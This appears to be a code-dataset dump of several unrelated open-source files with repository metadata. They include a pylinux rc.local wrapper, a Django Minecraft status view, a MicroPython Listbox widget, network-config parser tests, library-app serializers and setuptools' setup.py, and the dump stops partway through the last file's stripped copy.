f72ecf12d2a5bde9b692d56fb3192d8e48a7530b | 1,188 | py | Python | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | # /usr/bin/env python
# coding=utf-8
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
    """
    Configuration-file wrapper for /etc/rc.local.
    """
    # NOTE(review): ``file_config=RcLocalFileConfig()`` is evaluated once at
    # import time, so every RcLocal created with the default shares the same
    # config object -- confirm this sharing is intended.
    def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
                 file_config=RcLocalFileConfig()):
        super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
    def add_boot_item(self, cmd, name):
        """
        Add a boot (startup) item to rc.local.
        :param cmd: command line to run at boot; must be non-empty
        :param name: identifying name for the boot item; must be non-empty
        :raises NameNotValidException: if ``name`` is empty/falsy
        :raises SettingNotValidException: if ``cmd`` is empty/falsy
        NOTE(review): this currently only validates its arguments -- nothing
        is written to the file yet; the implementation appears unfinished.
        """
        if not name:
            raise NameNotValidException("name not valid while adding boot item")
        if not cmd:
            raise SettingNotValidException("setting not valid while adding boot item")
    def add_multi_line_setting(self, name, value):
        """Placeholder: multi-line settings are not implemented yet."""
        pass
| 33.942857 | 100 | 0.733165 |
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
file_config=RcLocalFileConfig()):
super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
def add_boot_item(self, cmd, name):
if not name:
raise NameNotValidException("name not valid while adding boot item")
if not cmd:
raise SettingNotValidException("setting not valid while adding boot item")
def add_multi_line_setting(self, name, value):
pass
| true | true |
f72ecf9d4483c1074b236e04b5a5c073a285db26 | 1,233 | py | Python | MinecraftServer/views.py | TN-1/ServerStatus | fcb9a2bddf06cc83edfb7fcf7b7535d22ff6f6bf | [
"MIT"
] | null | null | null | MinecraftServer/views.py | TN-1/ServerStatus | fcb9a2bddf06cc83edfb7fcf7b7535d22ff6f6bf | [
"MIT"
] | null | null | null | MinecraftServer/views.py | TN-1/ServerStatus | fcb9a2bddf06cc83edfb7fcf7b7535d22ff6f6bf | [
"MIT"
] | null | null | null | from django.shortcuts import render
from mcstatus import MinecraftServer
from MinecraftServer.models import MCServer, Admin
# Create your views here.
def index(request):
    """Render a status page covering every configured Minecraft server.

    For each MCServer row, query the server (preferring its IP address,
    falling back to its domain) via mcstatus and collect the result. On the
    first misconfigured or unreachable server, render an error page with the
    admin contact instead.

    Fixes over the original:
    - the no-address branch referenced the undefined name ``e`` (NameError,
      previously masked by the enclosing ``except``);
    - ``except Exception, e`` (Python-2-only syntax) replaced with the
      ``as e`` form, valid on both Python 2.6+ and Python 3;
    - removed the unused ``server`` accumulator list.
    """
    status = []
    servers = MCServer.objects.all()
    for srv in servers:
        # Prefer the raw IP address; fall back to the domain name.
        address = srv.IPaddress or srv.domain
        if not address:
            # Misconfigured row: no exception occurred, so do not append
            # str(e) here (the original did, raising NameError).
            status = "Server doesnt contain any addresses. Where am I meant to look? Please contact the admin"
            admin = Admin.objects.first()
            return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
        try:
            mcsrv = MinecraftServer("%s" % address, int(srv.port))
            status.append(mcsrv.status())
        except Exception as e:
            status = "Cant reach the server. Please contact the admin: " + str(e)
            admin = Admin.objects.first()
            return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
    return render(request, 'MinecraftServer/index.html', {'status': status})
from mcstatus import MinecraftServer
from MinecraftServer.models import MCServer, Admin
def index(request):
server = []
status = []
servers = MCServer.objects.all()
for srv in servers:
server.append(srv)
try:
if srv.IPaddress:
mcsrv = MinecraftServer("%s" % srv.IPaddress, int(srv.port))
status.append(mcsrv.status())
elif srv.domain:
mcsrv = MinecraftServer("%s" % srv.domain, int(srv.port))
status.append(mcsrv.status())
else:
status = "Server doesnt contain any addresses. Where am I meant to look? Please contact the admin: " + str(e)
admin = Admin.objects.first()
return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
except Exception, e:
status = "Cant reach the server. Please contact the admin: " + str(e)
admin = Admin.objects.first()
return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
return render(request, 'MinecraftServer/index.html', {'status': status}) | false | true |
f72ed12b9dd621b1fa7446c773458608d1e04750 | 6,036 | py | Python | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | # listbox.py Extension to ugui providing the Listbox class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2021 Peter Hinch
# 12 Sep 21 Support for scrolling.
from gui.core.ugui import Widget, display
from gui.core.colors import *
def dolittle(*_):
    """Default no-op callback (PEP 8 E731: a ``def`` instead of a lambda
    bound to a name). Accepts and ignores any positional arguments."""
    return None
# Behaviour has issues compared to touch displays because movement between
# entries is sequential. This can affect the choice in when the callback runs.
# It always runs when select is pressed. See 'also' ctor arg.
class Listbox(Widget):
    """A vertically scrolling listbox of text entries.

    Compared with touch displays, movement between entries is sequential,
    which affects when the callback runs: it always runs when select is
    pressed, and the ``also`` constructor arg can additionally trigger it
    on every currency move (ON_MOVE) and/or on leaving the control
    (ON_LEAVE).

    Fixes over the original: the initial ``value`` is clamped into
    ``[0, len(elements) - 1]`` (a negative or out-of-range value previously
    left the control with an invalid currency), and the mutable default
    ``args=[]`` was replaced with an immutable tuple.
    """
    ON_MOVE = 1  # Also run the callback whenever the currency moves.
    ON_LEAVE = 2  # Also run the callback on exit from the control.

    @staticmethod
    def dimensions(writer, elements, dlines):
        """Return ``(entry_height, height, dlines, textwidth)``.

        Shared with dropdown.py, so the signature and return order must
        stay stable.
        """
        entry_height = writer.height + 2  # One pixel above and below text.
        # Number of displayable lines (default: show every element).
        dlines = len(elements) if dlines is None else dlines
        height = entry_height * dlines + 2  # Overall height of the control.
        textwidth = max(writer.stringlen(s) for s in elements) + 4
        return entry_height, height, dlines, textwidth

    def __init__(self, writer, row, col, *,
                 elements,
                 dlines=None, width=None, value=0,
                 fgcolor=None, bgcolor=None, bdcolor=False,
                 fontcolor=None, select_color=DARKBLUE,
                 callback=dolittle, args=(), also=0):
        """Create a Listbox at (row, col).

        ``elements`` is either a sequence of strings, or a sequence of
        ``[text, callback, args]`` entries providing a per-element
        callback (in which case the ``callback`` kwarg must not be used).
        ``value`` is the initial currency, ``dlines`` the number of
        visible lines, and ``also`` a bitmask of ON_MOVE/ON_LEAVE.
        """
        e0 = elements[0]
        # Elements specified as (str, str, ...) or ([str, cb, args], ...)?
        if isinstance(e0, tuple) or isinstance(e0, list):
            self.els = elements  # Retain the originals for .despatch.
            self.elements = [x[0] for x in elements]  # Text component only.
            if callback is not dolittle:
                raise ValueError('Cannot specify callback.')
            self.cb = self.despatch  # Route through per-element callbacks.
        else:
            self.cb = callback
            self.elements = elements
        if any(not isinstance(s, str) for s in self.elements):
            raise ValueError('Invalid elements arg.')
        # Calculate dimensions.
        self.entry_height, height, self.dlines, tw = self.dimensions(
            writer, self.elements, dlines)
        if width is None:
            width = tw  # Default to the widest element's text width.
        self.also = also
        self.ntop = 0  # Index of the top visible line.
        if not isinstance(value, int):
            value = 0  # Invalid type: default to the first entry.
        else:
            # Clamp into range (robustness fix for negative/oversized values).
            value = max(0, min(value, len(self.elements) - 1))
        if value >= self.dlines:  # Initial value is off-screen: scroll.
            self.ntop = value - self.dlines + 1
        super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
        self.cb_args = args
        self.select_color = select_color
        self.fontcolor = fontcolor
        self._value = value  # No callback until the user selects.
        self.ev = value  # Baseline for value-change detection.

    def show(self):
        """Draw the visible window of elements, highlighting the currency."""
        if not super().show(False):  # Clear to self.bgcolor.
            return
        x = self.col
        y = self.row
        eh = self.entry_height
        ntop = self.ntop
        dlines = self.dlines
        nlines = min(dlines, len(self.elements))  # Displayable lines.
        for n in range(ntop, ntop + nlines):
            text = self.elements[n]
            if self.writer.stringlen(text) > self.width:  # Clip to width.
                font = self.writer.font
                pos = 0
                nch = 0
                for ch in text:
                    pos += font.get_ch(ch)[2]  # Width of the current char.
                    if pos > self.width:
                        break
                    nch += 1
                text = text[: nch]
            if n == self._value:  # Highlight the current row.
                display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
                display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
            else:
                display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
            y += eh
        # Draw short vertical lines hinting that more entries exist.
        x = self.col + self.width - 2
        if ntop:  # Entries hidden above the window.
            display.vline(x, self.row, eh - 1, self.fgcolor)
        if ntop + dlines < len(self.elements):  # Entries hidden below.
            y = self.row + (dlines - 1) * eh
            display.vline(x, y, eh - 1, self.fgcolor)

    def textvalue(self, text=None):  # If no arg, return the current text.
        """Get the current element's text, or set the currency by text.

        Returns the matched index (or None if *text* is not an element).
        """
        if text is None:
            return self.elements[self._value]
        else:  # Set value by text.
            try:
                v = self.elements.index(text)
            except ValueError:
                v = None
            else:
                if v != self._value:
                    self.value(v)
            return v

    def _vchange(self, vnew):
        """Apply a currency change, scrolling the window as needed."""
        if vnew >= self.ntop + self.dlines:  # Moved below the window.
            self.ntop = vnew - self.dlines + 1
        elif vnew < self.ntop:  # Moved above the window.
            self.ntop = vnew
        self.value(vnew)
        if (self.also & Listbox.ON_MOVE):  # Treat as if select pressed.
            self.do_sel()

    def do_adj(self, _, val):
        """Handle increment/decrement input: move the currency up or down."""
        v = self._value
        if val > 0:
            if v:
                self._vchange(v - 1)
        elif val < 0:
            if v < len(self.elements) - 1:
                self._vchange(v + 1)

    # The callback runs if select is pressed. Also (if ON_LEAVE) if the user
    # changes list currency and then moves off the control; otherwise a
    # callback that refreshes another control would not track currency.
    def do_sel(self):
        """Select was pressed: record the value and run the callback."""
        self.ev = self._value
        self.cb(self, *self.cb_args)

    def enter(self):
        """Focus entered the control: snapshot the value for leave()."""
        self.ev = self._value

    def leave(self):
        """Focus left the control: fire the callback if configured and the
        value changed while the control had focus."""
        if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
            self.do_sel()

    def despatch(self, _):
        """Run the per-element callback supplied in ``elements``."""
        x = self.els[self()]
        x[1](self, *x[2])
| 37.962264 | 102 | 0.567594 |
from gui.core.ugui import Widget, display
from gui.core.colors import *
dolittle = lambda *_ : None
class Listbox(Widget):
ON_MOVE = 1
ON_LEAVE = 2
@staticmethod
def dimensions(writer, elements, dlines):
entry_height = writer.height + 2
dlines = len(elements) if dlines is None else dlines
height = entry_height * dlines + 2
textwidth = max(writer.stringlen(s) for s in elements) + 4
return entry_height, height, dlines, textwidth
def __init__(self, writer, row, col, *,
elements,
dlines=None, width=None, value=0,
fgcolor=None, bgcolor=None, bdcolor=False,
fontcolor=None, select_color=DARKBLUE,
callback=dolittle, args=[], also=0):
e0 = elements[0]
if isinstance(e0, tuple) or isinstance(e0, list):
self.els = elements
self.elements = [x[0] for x in elements]
if callback is not dolittle:
raise ValueError('Cannot specify callback.')
self.cb = self.despatch
else:
self.cb = callback
self.elements = elements
if any(not isinstance(s, str) for s in self.elements):
raise ValueError('Invalid elements arg.')
self.entry_height, height, self.dlines, tw = self.dimensions(
writer, self.elements, dlines)
if width is None:
width = tw
self.also = also
self.ntop = 0
if not isinstance(value, int):
value = 0
elif value >= self.dlines:
value = min(value, len(elements) - 1)
self.ntop = value - self.dlines + 1
super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
self.cb_args = args
self.select_color = select_color
self.fontcolor = fontcolor
self._value = value
self.ev = value
def show(self):
if not super().show(False):
return
x = self.col
y = self.row
eh = self.entry_height
ntop = self.ntop
dlines = self.dlines
nlines = min(dlines, len(self.elements))
for n in range(ntop, ntop + nlines):
text = self.elements[n]
if self.writer.stringlen(text) > self.width:
font = self.writer.font
pos = 0
nch = 0
for ch in text:
pos += font.get_ch(ch)[2]
if pos > self.width:
break
nch += 1
text = text[: nch]
if n == self._value:
display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
else:
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
y += eh
x = self.col + self.width - 2
if ntop:
display.vline(x, self.row, eh - 1, self.fgcolor)
if ntop + dlines < len(self.elements):
y = self.row + (dlines - 1) * eh
display.vline(x, y, eh - 1, self.fgcolor)
def textvalue(self, text=None):
if text is None:
return self.elements[self._value]
else:
try:
v = self.elements.index(text)
except ValueError:
v = None
else:
if v != self._value:
self.value(v)
return v
def _vchange(self, vnew):
if vnew >= self.ntop + self.dlines:
self.ntop = vnew - self.dlines + 1
elif vnew < self.ntop:
self.ntop = vnew
self.value(vnew)
if (self.also & Listbox.ON_MOVE):
self.do_sel()
def do_adj(self, _, val):
v = self._value
if val > 0:
if v:
self._vchange(v -1)
elif val < 0:
if v < len(self.elements) - 1:
self._vchange(v + 1)
    def do_sel(self):
        """Run the user callback for the current selection."""
        self.ev = self._value  # remember the value last reported to the callback
        self.cb(self, *self.cb_args)

    def enter(self):
        """Focus gained: snapshot the current value for change detection."""
        self.ev = self._value

    def leave(self):
        """Focus lost: fire the callback if configured for ON_LEAVE and the
        selection changed while the control had focus."""
        if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
            self.do_sel()

    def despatch(self, _):
        # Invoke the callback bound to the currently selected element.
        # Element layout appears to be (text, callback, args) -- TODO confirm.
        x = self.els[self()]
        x[1](self, *x[2])
| true | true |
f72ed18097959bb4697efab08240d8e8fb10e5cf | 2,166 | py | Python | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 74 | 2015-01-07T17:03:43.000Z | 2022-02-06T17:08:54.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 26 | 2015-02-13T11:32:05.000Z | 2020-11-13T15:02:03.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 40 | 2015-01-22T17:12:03.000Z | 2021-12-09T20:37:35.000Z | # Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
    """Tests for the Debian ``interfaces`` metadata parser."""

    def setUp(self):
        metadata = fake_json_response.get_fake_metadata_json("2013-04-04")
        self.data = metadata["network_config"]["debian_config"]

    def _test_parse_nics(self, no_nics=False):
        """Parse ``self.data`` and compare against the fixture NICs."""
        nics = debiface.parse(self.data)
        if no_nics:
            self.assertFalse(nics)
            return
        expected = [
            service_base.NetworkDetails(
                fake_json_response.NAME0,
                fake_json_response.MAC0.upper(),
                fake_json_response.ADDRESS0,
                fake_json_response.NETMASK0,
                fake_json_response.BROADCAST0,
                fake_json_response.GATEWAY0,
                fake_json_response.DNSNS0.split(),
            ),
            service_base.NetworkDetails(
                fake_json_response.NAME1,
                None,
                fake_json_response.ADDRESS1,
                fake_json_response.NETMASK1,
                fake_json_response.BROADCAST1,
                fake_json_response.GATEWAY1,
                None,
            ),
        ]
        self.assertEqual(expected, nics)

    def test_nothing_to_parse(self):
        # None of these inputs describes a valid interfaces file.
        for data in (None, "", 324242, ("dasd", "dsa")):
            self.data = data
            self._test_parse_nics(no_nics=True)

    def test_parse(self):
        self._test_parse_nics()
| 33.84375 | 78 | 0.662973 |
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
def setUp(self):
date = "2013-04-04"
content = fake_json_response.get_fake_metadata_json(date)
self.data = content["network_config"]["debian_config"]
def _test_parse_nics(self, no_nics=False):
nics = debiface.parse(self.data)
if no_nics:
self.assertFalse(nics)
return
nic0 = service_base.NetworkDetails(
fake_json_response.NAME0,
fake_json_response.MAC0.upper(),
fake_json_response.ADDRESS0,
fake_json_response.NETMASK0,
fake_json_response.BROADCAST0,
fake_json_response.GATEWAY0,
fake_json_response.DNSNS0.split()
)
nic1 = service_base.NetworkDetails(
fake_json_response.NAME1,
None,
fake_json_response.ADDRESS1,
fake_json_response.NETMASK1,
fake_json_response.BROADCAST1,
fake_json_response.GATEWAY1,
None
)
self.assertEqual([nic0, nic1], nics)
def test_nothing_to_parse(self):
invalid = [None, "", 324242, ("dasd", "dsa")]
for data in invalid:
self.data = data
self._test_parse_nics(no_nics=True)
def test_parse(self):
self._test_parse_nics()
| true | true |
f72ed31f1f958ed758de28189f10278aab1054fa | 727 | py | Python | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | 6 | 2021-03-19T01:06:25.000Z | 2021-09-22T18:47:10.000Z | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
    """Serialize the basic identity fields of the active user model."""

    class Meta:
        model = get_user_model()
        fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
    """Serialize a single BorrowedBook loan record."""

    class Meta:
        model = BorrowedBook
        # NOTE(review): 'date_of_Pickup' casing presumably mirrors the model
        # field name -- verify against the BorrowedBook model.
        fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
    """Expose a user's borrowed books.

    NOTE(review): the declared ``user`` field is not listed in
    ``Meta.fields`` (only ``borrowed_books`` is). DRF may reject a
    declared-but-unlisted field -- confirm the intended field set.
    """
    # Reverse relation: primary keys of BorrowedBook rows for this user.
    user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())

    class Meta:
        model = get_user_model()
        fields = ['borrowed_books']
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
class Meta:
model = BorrowedBook
fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())
class Meta:
model = get_user_model()
fields = ['borrowed_books']
| true | true |
f72ed3a16a6afdb8aef7e5df2b36580380cf2269 | 6,680 | py | Python | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | 2 | 2017-05-23T12:05:28.000Z | 2018-05-08T20:38:23.000Z | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Distutils setup file, used to install or test 'setuptools'
"""
import io
import os
import sys
import textwrap
# Allow to run setup.py from another directory.
os.chdir(os.path.dirname(os.path.abspath(__file__)))

src_root = None

from distutils.util import convert_path

# Execute setuptools/command/__init__.py in an isolated namespace to read
# the list of setup commands (__all__) without importing the package that
# is in the middle of being installed.
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
    exec(init_file.read(), command_ns)

SETUP_COMMANDS = command_ns['__all__']

import setuptools

scripts = []
def _gen_console_scripts():
yield "easy_install = setuptools.command.easy_install:main"
# Gentoo distributions manage the python-version-specific scripts
# themselves, so those platforms define an environment variable to
# suppress the creation of the version-specific scripts.
var_names = (
'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
)
if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
return
yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
.format(shortver=sys.version[:3]))
console_scripts = list(_gen_console_scripts())
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
long_description = readme_file.read()
package_data = {
'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}
force_windows_specific_files = (
os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
not in (None, "", "0")
)
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
or force_windows_specific_files:
package_data.setdefault('setuptools', []).extend(['*.exe'])
package_data.setdefault('setuptools.command', []).extend(['*.xml'])
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
# Keyword arguments for setuptools.setup(), collected in a dict so they
# can be inspected or tweaked before the setup() call below.
setup_params = dict(
    name="setuptools",
    version="20.10.1",
    description="Easily download, build, install, upgrade, and uninstall "
                "Python packages",
    author="Python Packaging Authority",
    author_email="distutils-sig@python.org",
    long_description=long_description,
    keywords="CPAN PyPI distutils eggs package management",
    url="https://github.com/pypa/setuptools",
    src_root=src_root,
    packages=setuptools.find_packages(exclude=['*.tests']),
    package_data=package_data,
    py_modules=['easy_install'],
    zip_safe=True,
    entry_points={
        # Register every command found in setuptools/command/__init__.py.
        "distutils.commands": [
            "%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
            for cmd in SETUP_COMMANDS
        ],
        # Validators for the extra setup() keywords setuptools introduces.
        "distutils.setup_keywords": [
            "eager_resources = setuptools.dist:assert_string_list",
            "namespace_packages = setuptools.dist:check_nsp",
            "extras_require = setuptools.dist:check_extras",
            "install_requires = setuptools.dist:check_requirements",
            "tests_require = setuptools.dist:check_requirements",
            "setup_requires = setuptools.dist:check_requirements",
            "entry_points = setuptools.dist:check_entry_points",
            "test_suite = setuptools.dist:check_test_suite",
            "zip_safe = setuptools.dist:assert_bool",
            "package_data = setuptools.dist:check_package_data",
            "exclude_package_data = setuptools.dist:check_package_data",
            "include_package_data = setuptools.dist:assert_bool",
            "packages = setuptools.dist:check_packages",
            "dependency_links = setuptools.dist:assert_string_list",
            "test_loader = setuptools.dist:check_importable",
            "test_runner = setuptools.dist:check_importable",
            "use_2to3 = setuptools.dist:assert_bool",
            "convert_2to3_doctests = setuptools.dist:assert_string_list",
            "use_2to3_fixers = setuptools.dist:assert_string_list",
            "use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
        ],
        # Writers for the metadata files placed inside EGG-INFO.
        "egg_info.writers": [
            "PKG-INFO = setuptools.command.egg_info:write_pkg_info",
            "requires.txt = setuptools.command.egg_info:write_requirements",
            "entry_points.txt = setuptools.command.egg_info:write_entries",
            "eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
            "namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
            "top_level.txt = setuptools.command.egg_info:write_toplevel_names",
            "depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
            "dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
        ],
        "console_scripts": console_scripts,
        "setuptools.installation":
            ['eggsecutable = setuptools.command.easy_install:bootstrap'],
    },
    classifiers=textwrap.dedent("""
        Development Status :: 5 - Production/Stable
        Intended Audience :: Developers
        License :: OSI Approved :: MIT License
        Operating System :: OS Independent
        Programming Language :: Python :: 2.6
        Programming Language :: Python :: 2.7
        Programming Language :: Python :: 3
        Programming Language :: Python :: 3.3
        Programming Language :: Python :: 3.4
        Programming Language :: Python :: 3.5
        Topic :: Software Development :: Libraries :: Python Modules
        Topic :: System :: Archiving :: Packaging
        Topic :: System :: Systems Administration
        Topic :: Utilities
        """).strip().splitlines(),
    extras_require={
        "ssl:sys_platform=='win32'": "wincertstore==0.2",
        "certs": "certifi==2016.2.28",
    },
    dependency_links=[
        'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
        'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
    ],
    scripts=[],
    tests_require=[
        'setuptools[ssl]',
        'pytest>=2.8',
    ] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
    setup_requires=[
    ] + sphinx + pytest_runner + wheel,
)

if __name__ == '__main__':
    # Run the actual installation/build when executed as a script.
    dist = setuptools.setup(**setup_params)
| 40.240964 | 123 | 0.655689 |
import io
import os
import sys
import textwrap
os.chdir(os.path.dirname(os.path.abspath(__file__)))
src_root = None
from distutils.util import convert_path
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
exec(init_file.read(), command_ns)
SETUP_COMMANDS = command_ns['__all__']
import setuptools
scripts = []
def _gen_console_scripts():
yield "easy_install = setuptools.command.easy_install:main"
var_names = (
'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
)
if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
return
yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
.format(shortver=sys.version[:3]))
console_scripts = list(_gen_console_scripts())
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
long_description = readme_file.read()
package_data = {
'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}
force_windows_specific_files = (
os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
not in (None, "", "0")
)
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
or force_windows_specific_files:
package_data.setdefault('setuptools', []).extend(['*.exe'])
package_data.setdefault('setuptools.command', []).extend(['*.xml'])
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
setup_params = dict(
name="setuptools",
version="20.10.1",
description="Easily download, build, install, upgrade, and uninstall "
"Python packages",
author="Python Packaging Authority",
author_email="distutils-sig@python.org",
long_description=long_description,
keywords="CPAN PyPI distutils eggs package management",
url="https://github.com/pypa/setuptools",
src_root=src_root,
packages=setuptools.find_packages(exclude=['*.tests']),
package_data=package_data,
py_modules=['easy_install'],
zip_safe=True,
entry_points={
"distutils.commands": [
"%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
for cmd in SETUP_COMMANDS
],
"distutils.setup_keywords": [
"eager_resources = setuptools.dist:assert_string_list",
"namespace_packages = setuptools.dist:check_nsp",
"extras_require = setuptools.dist:check_extras",
"install_requires = setuptools.dist:check_requirements",
"tests_require = setuptools.dist:check_requirements",
"setup_requires = setuptools.dist:check_requirements",
"entry_points = setuptools.dist:check_entry_points",
"test_suite = setuptools.dist:check_test_suite",
"zip_safe = setuptools.dist:assert_bool",
"package_data = setuptools.dist:check_package_data",
"exclude_package_data = setuptools.dist:check_package_data",
